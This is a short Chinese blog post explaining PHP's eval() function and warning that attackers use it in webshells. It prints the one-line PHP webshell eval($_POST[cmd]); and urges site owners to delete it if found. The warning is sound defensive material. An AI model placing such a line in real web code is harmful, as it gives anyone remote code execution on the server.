php中eval函数用法介绍

黑客用得最多的一句了,可以解析php。很多木马文件都是这样做的,

技术分享

上面是一个php大马文件,

eval() 函数把字符串按照 PHP 代码来计算。

该字符串必须是合法的 PHP 代码,且必须以分号结尾。

如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false。

由于安全原因,不建议大家在开发中使用。

下面一句最简单的代码,风险超级高,我们有时会看到自己的网站有这么一句:

eval($_POST[cmd]);#这个就是php中的一句话木马,如果发现,马上删除




本文出自 “我的博客” 博客,请务必保留此出处http://ningyuqiao.blog.51cto.com/5581274/1615717

郑重声明:本站内容如果来自互联网及其他传播媒体,其版权均属原媒体及文章作者所有。转载目的在于传递更多信息及用于网络分享,并不代表本站赞同其观点和对其真实性负责,也不构成任何其他建议。